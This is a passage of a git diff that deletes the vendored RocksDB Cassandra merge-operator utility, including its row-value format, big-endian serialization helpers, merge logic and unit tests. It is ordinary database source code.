-
-  row_values.push_back(
-    CreateRowTombstone(17)
-  );
-
-  merged = RowValue::Merge(std::move(row_values));
-  EXPECT_TRUE(merged.IsTombstone());
-  EXPECT_EQ(merged.LastModifiedTime(), 17);
-}
-
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_serialize_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_serialize_test.cc
deleted file mode 100644
index 68d2c16..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_serialize_test.cc
+++ /dev/null
@@ -1,188 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/testharness.h"
-#include "utilities/cassandra/serialize.h"
-
-using namespace rocksdb::cassandra;
-
-namespace rocksdb {
-namespace cassandra {
-
-TEST(SerializeTest, SerializeI64) {
-  std::string dest;
-  Serialize<int64_t>(0, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00'}),
-      dest);
-
-  dest.clear();
-  Serialize<int64_t>(1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x01'}),
-      dest);
-
-
-  dest.clear();
-  Serialize<int64_t>(-1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\xff', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int64_t>(9223372036854775807, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x7f', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int64_t>(-9223372036854775807, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x80', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x01'}),
-      dest);
-}
-
-TEST(SerializeTest, DeserializeI64) {
-  std::string dest;
-  std::size_t offset = dest.size();
-  Serialize<int64_t>(0, &dest);
-  EXPECT_EQ(0, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(1, &dest);
-  EXPECT_EQ(1, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(-1, &dest);
-  EXPECT_EQ(-1, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(-9223372036854775807, &dest);
-  EXPECT_EQ(-9223372036854775807, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(9223372036854775807, &dest);
-  EXPECT_EQ(9223372036854775807, Deserialize<int64_t>(dest.c_str(), offset));
-}
-
-TEST(SerializeTest, SerializeI32) {
-  std::string dest;
-  Serialize<int32_t>(0, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x00'}),
-      dest);
-
-  dest.clear();
-  Serialize<int32_t>(1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x01'}),
-      dest);
-
-
-  dest.clear();
-  Serialize<int32_t>(-1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\xff', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int32_t>(2147483647, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x7f', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int32_t>(-2147483648LL, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x80', '\x00', '\x00', '\x00'}),
-      dest);
-}
-
-TEST(SerializeTest, DeserializeI32) {
-  std::string dest;
-  std::size_t offset = dest.size();
-  Serialize<int32_t>(0, &dest);
-  EXPECT_EQ(0, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(1, &dest);
-  EXPECT_EQ(1, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(-1, &dest);
-  EXPECT_EQ(-1, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(2147483647, &dest);
-  EXPECT_EQ(2147483647, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(-2147483648LL, &dest);
-  EXPECT_EQ(-2147483648LL, Deserialize<int32_t>(dest.c_str(), offset));
-}
-
-TEST(SerializeTest, SerializeI8) {
-  std::string dest;
-  Serialize<int8_t>(0, &dest);
-  EXPECT_EQ(std::string({'\x00'}), dest);
-
-  dest.clear();
-  Serialize<int8_t>(1, &dest);
-  EXPECT_EQ(std::string({'\x01'}), dest);
-
-
-  dest.clear();
-  Serialize<int8_t>(-1, &dest);
-  EXPECT_EQ(std::string({'\xff'}), dest);
-
-  dest.clear();
-  Serialize<int8_t>(127, &dest);
-  EXPECT_EQ(std::string({'\x7f'}), dest);
-
-  dest.clear();
-  Serialize<int8_t>(-128, &dest);
-  EXPECT_EQ(std::string({'\x80'}), dest);
-}
-
-TEST(SerializeTest, DeserializeI8) {
-  std::string dest;
-  std::size_t offset = dest.size();
-  Serialize<int8_t>(0, &dest);
-  EXPECT_EQ(0, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(1, &dest);
-  EXPECT_EQ(1, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(-1, &dest);
-  EXPECT_EQ(-1, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(127, &dest);
-  EXPECT_EQ(127, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(-128, &dest);
-  EXPECT_EQ(-128, Deserialize<int8_t>(dest.c_str(), offset));
-}
-
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/format.cc b/thirdparty/rocksdb/utilities/cassandra/format.cc
deleted file mode 100644
index 2b096cd..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/format.cc
+++ /dev/null
@@ -1,362 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "format.h"
-
-#include <algorithm>
-#include <map>
-#include <memory>
-
-#include "utilities/cassandra/serialize.h"
-
-namespace rocksdb {
-namespace cassandra {
-namespace {
-const int32_t kDefaultLocalDeletionTime =
-  std::numeric_limits<int32_t>::max();
-const int64_t kDefaultMarkedForDeleteAt =
-  std::numeric_limits<int64_t>::min();
-}
-
-ColumnBase::ColumnBase(int8_t mask, int8_t index)
-  : mask_(mask), index_(index) {}
-
-std::size_t ColumnBase::Size() const {
-  return sizeof(mask_) + sizeof(index_);
-}
-
-int8_t ColumnBase::Mask() const {
-  return mask_;
-}
-
-int8_t ColumnBase::Index() const {
-  return index_;
-}
-
-void ColumnBase::Serialize(std::string* dest) const {
-  rocksdb::cassandra::Serialize<int8_t>(mask_, dest);
-  rocksdb::cassandra::Serialize<int8_t>(index_, dest);
-}
-
-std::shared_ptr<ColumnBase> ColumnBase::Deserialize(const char* src,
-                                                    std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  if ((mask & ColumnTypeMask::DELETION_MASK) != 0) {
-    return Tombstone::Deserialize(src, offset);
-  } else if ((mask & ColumnTypeMask::EXPIRATION_MASK) != 0) {
-    return ExpiringColumn::Deserialize(src, offset);
-  } else {
-    return Column::Deserialize(src, offset);
-  }
-}
-
-Column::Column(
-  int8_t mask,
-  int8_t index,
-  int64_t timestamp,
-  int32_t value_size,
-  const char* value
-) : ColumnBase(mask, index), timestamp_(timestamp),
-  value_size_(value_size), value_(value) {}
-
-int64_t Column::Timestamp() const {
-  return timestamp_;
-}
-
-std::size_t Column::Size() const {
-  return ColumnBase::Size() + sizeof(timestamp_) + sizeof(value_size_)
-    + value_size_;
-}
-
-void Column::Serialize(std::string* dest) const {
-  ColumnBase::Serialize(dest);
-  rocksdb::cassandra::Serialize<int64_t>(timestamp_, dest);
-  rocksdb::cassandra::Serialize<int32_t>(value_size_, dest);
-  dest->append(value_, value_size_);
-}
-
-std::shared_ptr<Column> Column::Deserialize(const char *src,
-                                            std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(mask);
-  int8_t index = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(index);
-  int64_t timestamp = rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  offset += sizeof(timestamp);
-  int32_t value_size = rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(value_size);
-  return std::make_shared<Column>(
-    mask, index, timestamp, value_size, src + offset);
-}
-
-ExpiringColumn::ExpiringColumn(
-  int8_t mask,
-  int8_t index,
-  int64_t timestamp,
-  int32_t value_size,
-  const char* value,
-  int32_t ttl
-) : Column(mask, index, timestamp, value_size, value),
-  ttl_(ttl) {}
-
-std::size_t ExpiringColumn::Size() const {
-  return Column::Size() + sizeof(ttl_);
-}
-
-void ExpiringColumn::Serialize(std::string* dest) const {
-  Column::Serialize(dest);
-  rocksdb::cassandra::Serialize<int32_t>(ttl_, dest);
-}
-
-std::chrono::time_point<std::chrono::system_clock> ExpiringColumn::TimePoint() const {
-  return std::chrono::time_point<std::chrono::system_clock>(std::chrono::microseconds(Timestamp()));
-}
-
-std::chrono::seconds ExpiringColumn::Ttl() const {
-  return std::chrono::seconds(ttl_);
-}
-
-bool ExpiringColumn::Expired() const {
-  return TimePoint() + Ttl() < std::chrono::system_clock::now();
-}
-
-std::shared_ptr<Tombstone> ExpiringColumn::ToTombstone() const {
-  auto expired_at = (TimePoint() + Ttl()).time_since_epoch();
-  int32_t local_deletion_time = static_cast<int32_t>(
-    std::chrono::duration_cast<std::chrono::seconds>(expired_at).count());
-  int64_t marked_for_delete_at =
-    std::chrono::duration_cast<std::chrono::microseconds>(expired_at).count();
-  return std::make_shared<Tombstone>(
-    ColumnTypeMask::DELETION_MASK,
-    Index(),
-    local_deletion_time,
-    marked_for_delete_at);
-}
-
-std::shared_ptr<ExpiringColumn> ExpiringColumn::Deserialize(
-    const char *src,
-    std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(mask);
-  int8_t index = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(index);
-  int64_t timestamp = rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  offset += sizeof(timestamp);
-  int32_t value_size = rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(value_size);
-  const char* value = src + offset;
-  offset += value_size;
-  int32_t ttl =  rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  return std::make_shared<ExpiringColumn>(
-    mask, index, timestamp, value_size, value, ttl);
-}
-
-Tombstone::Tombstone(
-  int8_t mask,
-  int8_t index,
-  int32_t local_deletion_time,
-  int64_t marked_for_delete_at
-) : ColumnBase(mask, index), local_deletion_time_(local_deletion_time),
-  marked_for_delete_at_(marked_for_delete_at) {}
-
-int64_t Tombstone::Timestamp() const {
-  return marked_for_delete_at_;
-}
-
-std::size_t Tombstone::Size() const {
-  return ColumnBase::Size() + sizeof(local_deletion_time_)
-    + sizeof(marked_for_delete_at_);
-}
-
-void Tombstone::Serialize(std::string* dest) const {
-  ColumnBase::Serialize(dest);
-  rocksdb::cassandra::Serialize<int32_t>(local_deletion_time_, dest);
-  rocksdb::cassandra::Serialize<int64_t>(marked_for_delete_at_, dest);
-}
-
-std::shared_ptr<Tombstone> Tombstone::Deserialize(const char *src,
-                                                  std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(mask);
-  int8_t index = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(index);
-  int32_t local_deletion_time =
-    rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(int32_t);
-  int64_t marked_for_delete_at =
-    rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  return std::make_shared<Tombstone>(
-    mask, index, local_deletion_time, marked_for_delete_at);
-}
-
-RowValue::RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at)
-  : local_deletion_time_(local_deletion_time),
-  marked_for_delete_at_(marked_for_delete_at), columns_(),
-  last_modified_time_(0) {}
-
-RowValue::RowValue(Columns columns,
-                  int64_t last_modified_time)
-  : local_deletion_time_(kDefaultLocalDeletionTime),
-  marked_for_delete_at_(kDefaultMarkedForDeleteAt),
-  columns_(std::move(columns)), last_modified_time_(last_modified_time) {}
-
-std::size_t RowValue::Size() const {
-  std::size_t size = sizeof(local_deletion_time_)
-    + sizeof(marked_for_delete_at_);
-  for (const auto& column : columns_) {
-    size += column -> Size();
-  }
-  return size;
-}
-
-int64_t RowValue::LastModifiedTime() const {
-  if (IsTombstone()) {
-    return marked_for_delete_at_;
-  } else {
-    return last_modified_time_;
-  }
-}
-
-bool RowValue::IsTombstone() const {
-  return marked_for_delete_at_ > kDefaultMarkedForDeleteAt;
-}
-
-void RowValue::Serialize(std::string* dest) const {
-  rocksdb::cassandra::Serialize<int32_t>(local_deletion_time_, dest);
-  rocksdb::cassandra::Serialize<int64_t>(marked_for_delete_at_, dest);
-  for (const auto& column : columns_) {
-    column -> Serialize(dest);
-  }
-}
-
-RowValue RowValue::PurgeTtl(bool* changed) const {
-  *changed = false;
-  Columns new_columns;
-  for (auto& column : columns_) {
-    if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) {
-      std::shared_ptr<ExpiringColumn> expiring_column =
-        std::static_pointer_cast<ExpiringColumn>(column);
-
-      if(expiring_column->Expired()){
-        *changed = true;
-        continue;
-      }
-    }
-
-    new_columns.push_back(column);
-  }
-  return RowValue(std::move(new_columns), last_modified_time_);
-}
-
-RowValue RowValue::ExpireTtl(bool* changed) const {
-  *changed = false;
-  Columns new_columns;
-  for (auto& column : columns_) {
-    if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) {
-      std::shared_ptr<ExpiringColumn> expiring_column =
-        std::static_pointer_cast<ExpiringColumn>(column);
-
-      if(expiring_column->Expired()) {
-        shared_ptr<Tombstone> tombstone = expiring_column->ToTombstone();
-        new_columns.push_back(tombstone);
-        *changed = true;
-        continue;
-      }
-    }
-    new_columns.push_back(column);
-  }
-  return RowValue(std::move(new_columns), last_modified_time_);
-}
-
-bool RowValue::Empty() const {
-  return columns_.empty();
-}
-
-RowValue RowValue::Deserialize(const char *src, std::size_t size) {
-  std::size_t offset = 0;
-  assert(size >= sizeof(local_deletion_time_) + sizeof(marked_for_delete_at_));
-  int32_t local_deletion_time =
-    rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(int32_t);
-  int64_t marked_for_delete_at =
-    rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  offset += sizeof(int64_t);
-  if (offset == size) {
-    return RowValue(local_deletion_time, marked_for_delete_at);
-  }
-
-  assert(local_deletion_time == kDefaultLocalDeletionTime);
-  assert(marked_for_delete_at == kDefaultMarkedForDeleteAt);
-  Columns columns;
-  int64_t last_modified_time = 0;
-  while (offset < size) {
-    auto c = ColumnBase::Deserialize(src, offset);
-    offset += c -> Size();
-    assert(offset <= size);
-    last_modified_time = std::max(last_modified_time, c -> Timestamp());
-    columns.push_back(std::move(c));
-  }
-
-  return RowValue(std::move(columns), last_modified_time);
-}
-
-// Merge multiple row values into one.
-// For each column in rows with same index, we pick the one with latest
-// timestamp. And we also take row tombstone into consideration, by iterating
-// each row from reverse timestamp order, and stop once we hit the first
-// row tombstone.
-RowValue RowValue::Merge(std::vector<RowValue>&& values) {
-  assert(values.size() > 0);
-  if (values.size() == 1) {
-    return std::move(values[0]);
-  }
-
-  // Merge columns by their last modified time, and skip once we hit
-  // a row tombstone.
-  std::sort(values.begin(), values.end(),
-    [](const RowValue& r1, const RowValue& r2) {
-      return r1.LastModifiedTime() > r2.LastModifiedTime();
-    });
-
-  std::map<int8_t, std::shared_ptr<ColumnBase>> merged_columns;
-  int64_t tombstone_timestamp = 0;
-
-  for (auto& value : values) {
-    if (value.IsTombstone()) {
-      if (merged_columns.size() == 0) {
-        return std::move(value);
-      }
-      tombstone_timestamp = value.LastModifiedTime();
-      break;
-    }
-    for (auto& column : value.columns_) {
-      int8_t index = column->Index();
-      if (merged_columns.find(index) == merged_columns.end()) {
-        merged_columns[index] = column;
-      } else {
-        if (column->Timestamp() > merged_columns[index]->Timestamp()) {
-          merged_columns[index] = column;
-        }
-      }
-    }
-  }
-
-  int64_t last_modified_time = 0;
-  Columns columns;
-  for (auto& pair: merged_columns) {
-    // For some row, its last_modified_time > row tombstone_timestamp, but
-    // it might have rows whose timestamp is ealier than tombstone, so we
-    // ned to filter these rows.
-    if (pair.second->Timestamp() <= tombstone_timestamp) {
-      continue;
-    }
-    last_modified_time = std::max(last_modified_time, pair.second->Timestamp());
-    columns.push_back(std::move(pair.second));
-  }
-  return RowValue(std::move(columns), last_modified_time);
-}
-
-} // namepsace cassandrda
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/format.h b/thirdparty/rocksdb/utilities/cassandra/format.h
deleted file mode 100644
index fad6df4..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/format.h
+++ /dev/null
@@ -1,183 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/**
- * The encoding of Cassandra Row Value.
- *
- * A Cassandra Row Value could either be a row tombstone,
- * or contains multiple columns, it has following fields:
- *
- * struct row_value {
- *   int32_t local_deletion_time;  // Time in second when the row is deleted,
- *                                 // only used for Cassandra tombstone gc.
- *   int64_t marked_for_delete_at; // Ms that marked this row is deleted.
- *   struct column_base columns[]; // For non tombstone row, all columns
- *                                 // are stored here.
- * }
- *
- * If the local_deletion_time and marked_for_delete_at is set, then this is
- * a tombstone, otherwise it contains multiple columns.
- *
- * There are three type of Columns: Normal Column, Expiring Column and Column
- * Tombstone, which have following fields:
- *
- * // Identify the type of the column.
- * enum mask {
- *   DELETION_MASK = 0x01,
- *   EXPIRATION_MASK = 0x02,
- * };
- *
- * struct column  {
- *   int8_t mask = 0;
- *   int8_t index;
- *   int64_t timestamp;
- *   int32_t value_length;
- *   char value[value_length];
- * }
- *
- * struct expiring_column  {
- *   int8_t mask = mask.EXPIRATION_MASK;
- *   int8_t index;
- *   int64_t timestamp;
- *   int32_t value_length;
- *   char value[value_length];
- *   int32_t ttl;
- * }
- *
- * struct tombstone_column  {
- *   int8_t mask = mask.DELETION_MASK;
- *   int8_t index;
- *   int32_t local_deletion_time; // Similar to row_value's field.
- *   int64_t marked_for_delete_at;
- *  }
- */
-
-#pragma once
-#include <chrono>
-#include <vector>
-#include <memory>
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-// Identify the type of the column.
-enum ColumnTypeMask {
-  DELETION_MASK = 0x01,
-  EXPIRATION_MASK = 0x02,
-};
-
-
-class ColumnBase {
-public:
-  ColumnBase(int8_t mask, int8_t index);
-  virtual ~ColumnBase() = default;
-
-  virtual int64_t Timestamp() const = 0;
-  virtual int8_t Mask() const;
-  virtual int8_t Index() const;
-  virtual std::size_t Size() const;
-  virtual void Serialize(std::string* dest) const;
-  static std::shared_ptr<ColumnBase> Deserialize(const char* src,
-                                                 std::size_t offset);
-
-private:
-  int8_t mask_;
-  int8_t index_;
-};
-
-class Column : public ColumnBase {
-public:
-  Column(int8_t mask, int8_t index, int64_t timestamp,
-    int32_t value_size, const char* value);
-
-  virtual int64_t Timestamp() const override;
-  virtual std::size_t Size() const override;
-  virtual void Serialize(std::string* dest) const override;
-  static std::shared_ptr<Column> Deserialize(const char* src,
-                                             std::size_t offset);
-
-private:
-  int64_t timestamp_;
-  int32_t value_size_;
-  const char* value_;
-};
-
-class Tombstone : public ColumnBase {
-public:
-  Tombstone(int8_t mask, int8_t index,
-    int32_t local_deletion_time, int64_t marked_for_delete_at);
-
-  virtual int64_t Timestamp() const override;
-  virtual std::size_t Size() const override;
-  virtual void Serialize(std::string* dest) const override;
-
-  static std::shared_ptr<Tombstone> Deserialize(const char* src,
-                                                std::size_t offset);
-
-private:
-  int32_t local_deletion_time_;
-  int64_t marked_for_delete_at_;
-};
-
-class ExpiringColumn : public Column {
-public:
-  ExpiringColumn(int8_t mask, int8_t index, int64_t timestamp,
-    int32_t value_size, const char* value, int32_t ttl);
-
-  virtual std::size_t Size() const override;
-  virtual void Serialize(std::string* dest) const override;
-  bool Expired() const;
-  std::shared_ptr<Tombstone> ToTombstone() const;
-
-  static std::shared_ptr<ExpiringColumn> Deserialize(const char* src,
-                                                     std::size_t offset);
-
-private:
-  int32_t ttl_;
-  std::chrono::time_point<std::chrono::system_clock> TimePoint() const;
-  std::chrono::seconds Ttl() const;
-};
-
-typedef std::vector<std::shared_ptr<ColumnBase>> Columns;
-
-class RowValue {
-public:
-  // Create a Row Tombstone.
-  RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at);
-  // Create a Row containing columns.
-  RowValue(Columns columns,
-           int64_t last_modified_time);
-  RowValue(const RowValue& that) = delete;
-  RowValue(RowValue&& that) noexcept = default;
-  RowValue& operator=(const RowValue& that) = delete;
-  RowValue& operator=(RowValue&& that) = default;
-
-  std::size_t Size() const;;
-  bool IsTombstone() const;
-  // For Tombstone this returns the marked_for_delete_at_,
-  // otherwise it returns the max timestamp of containing columns.
-  int64_t LastModifiedTime() const;
-  void Serialize(std::string* dest) const;
-  RowValue PurgeTtl(bool* changed) const;
-  RowValue ExpireTtl(bool* changed) const;
-  bool Empty() const;
-
-  static RowValue Deserialize(const char* src, std::size_t size);
-  // Merge multiple rows according to their timestamp.
-  static RowValue Merge(std::vector<RowValue>&& values);
-
-private:
-  int32_t local_deletion_time_;
-  int64_t marked_for_delete_at_;
-  Columns columns_;
-  int64_t last_modified_time_;
-
-};
-
-} // namepsace cassandrda
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/merge_operator.cc b/thirdparty/rocksdb/utilities/cassandra/merge_operator.cc
deleted file mode 100644
index 715ef85..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/merge_operator.cc
+++ /dev/null
@@ -1,80 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "merge_operator.h"
-
-#include <memory>
-#include <assert.h>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-#include "utilities/cassandra/format.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-// Implementation for the merge operation (merges two Cassandra values)
-bool CassandraValueMergeOperator::FullMergeV2(
-    const MergeOperationInput& merge_in,
-    MergeOperationOutput* merge_out) const {
-  // Clear the *new_value for writing.
-  merge_out->new_value.clear();
-
-  if (merge_in.existing_value == nullptr && merge_in.operand_list.size() == 1) {
-    // Only one operand
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-
-  std::vector<RowValue> row_values;
-  if (merge_in.existing_value) {
-    row_values.push_back(
-      RowValue::Deserialize(merge_in.existing_value->data(),
-                            merge_in.existing_value->size()));
-  }
-
-  for (auto& operand : merge_in.operand_list) {
-    row_values.push_back(RowValue::Deserialize(operand.data(), operand.size()));
-  }
-
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  merge_out->new_value.reserve(merged.Size());
-  merged.Serialize(&(merge_out->new_value));
-
-  return true;
-}
-
-bool CassandraValueMergeOperator::PartialMergeMulti(
-    const Slice& key,
-    const std::deque<Slice>& operand_list,
-    std::string* new_value,
-    Logger* logger) const {
-  // Clear the *new_value for writing.
-  assert(new_value);
-  new_value->clear();
-
-  std::vector<RowValue> row_values;
-  for (auto& operand : operand_list) {
-    row_values.push_back(RowValue::Deserialize(operand.data(), operand.size()));
-  }
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  new_value->reserve(merged.Size());
-  merged.Serialize(new_value);
-  return true;
-}
-
-const char* CassandraValueMergeOperator::Name() const  {
-  return "CassandraValueMergeOperator";
-}
-
-} // namespace cassandra
-
-std::shared_ptr<MergeOperator>
-    MergeOperators::CreateCassandraMergeOperator() {
-  return std::make_shared<rocksdb::cassandra::CassandraValueMergeOperator>();
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/merge_operator.h b/thirdparty/rocksdb/utilities/cassandra/merge_operator.h
deleted file mode 100644
index 28066ca..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/merge_operator.h
+++ /dev/null
@@ -1,33 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-/**
- * A MergeOperator for rocksdb that implements Cassandra row value merge.
- */
-class CassandraValueMergeOperator : public MergeOperator {
-public:
-  static std::shared_ptr<MergeOperator> CreateSharedInstance();
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override;
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override;
-
-  virtual const char* Name() const override;
-
-  virtual bool AllowSingleOperand() const override { return true; }
-};
-} // namespace cassandra
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/serialize.h b/thirdparty/rocksdb/utilities/cassandra/serialize.h
deleted file mode 100644
index 64ccd4c..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/serialize.h
+++ /dev/null
@@ -1,75 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/**
- * Helper functions which serialize and deserialize integers
- * into bytes in big endian.
- */
-
-#pragma once
-
-namespace rocksdb {
-namespace cassandra {
-namespace {
-const int64_t kCharMask = 0xFFLL;
-const int32_t kBitsPerByte = 8;
-}
-
-template<typename T>
-void Serialize(T val, std::string* dest);
-
-template<typename T>
-T Deserialize(const char* src, std::size_t offset=0);
-
-// Specializations
-template<>
-inline void Serialize<int8_t>(int8_t t, std::string* dest) {
-  dest->append(1, static_cast<char>(t & kCharMask));
-}
-
-template<>
-inline void Serialize<int32_t>(int32_t t, std::string* dest) {
-  for (unsigned long i = 0; i < sizeof(int32_t); i++) {
-     dest->append(1, static_cast<char>(
-       (t >> (sizeof(int32_t) - 1 - i) * kBitsPerByte) & kCharMask));
-  }
-}
-
-template<>
-inline void Serialize<int64_t>(int64_t t, std::string* dest) {
-  for (unsigned long i = 0; i < sizeof(int64_t); i++) {
-     dest->append(
-       1, static_cast<char>(
-         (t >> (sizeof(int64_t) - 1 - i) * kBitsPerByte) & kCharMask));
-  }
-}
-
-template<>
-inline int8_t Deserialize<int8_t>(const char* src, std::size_t offset) {
-  return static_cast<int8_t>(src[offset]);
-}
-
-template<>
-inline int32_t Deserialize<int32_t>(const char* src, std::size_t offset) {
-  int32_t result = 0;
-  for (unsigned long i = 0; i < sizeof(int32_t); i++) {
-    result |= static_cast<int32_t>(static_cast<unsigned char>(src[offset + i]))
-        << ((sizeof(int32_t) - 1 - i) * kBitsPerByte);
-  }
-  return result;
-}
-
-template<>
-inline int64_t Deserialize<int64_t>(const char* src, std::size_t offset) {
-  int64_t result = 0;
-  for (unsigned long i = 0; i < sizeof(int64_t); i++) {
-    result |= static_cast<int64_t>(static_cast<unsigned char>(src[offset + i]))
-        << ((sizeof(int64_t) - 1 - i) * kBitsPerByte);
-  }
-  return result;
-}
-
-} // namepsace cassandrda
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/test_utils.cc b/thirdparty/rocksdb/utilities/cassandra/test_utils.cc
deleted file mode 100644
index 61f53b2..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/test_utils.cc
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "test_utils.h"
-
-namespace rocksdb {
-namespace cassandra {
-const char kData[] = {'d', 'a', 't', 'a'};
-const char kExpiringData[] = {'e', 'd', 'a', 't', 'a'};
-const int32_t kLocalDeletionTime = 1;
-const int32_t kTtl = 86400;
-const int8_t kColumn = 0;
-const int8_t kTombstone = 1;
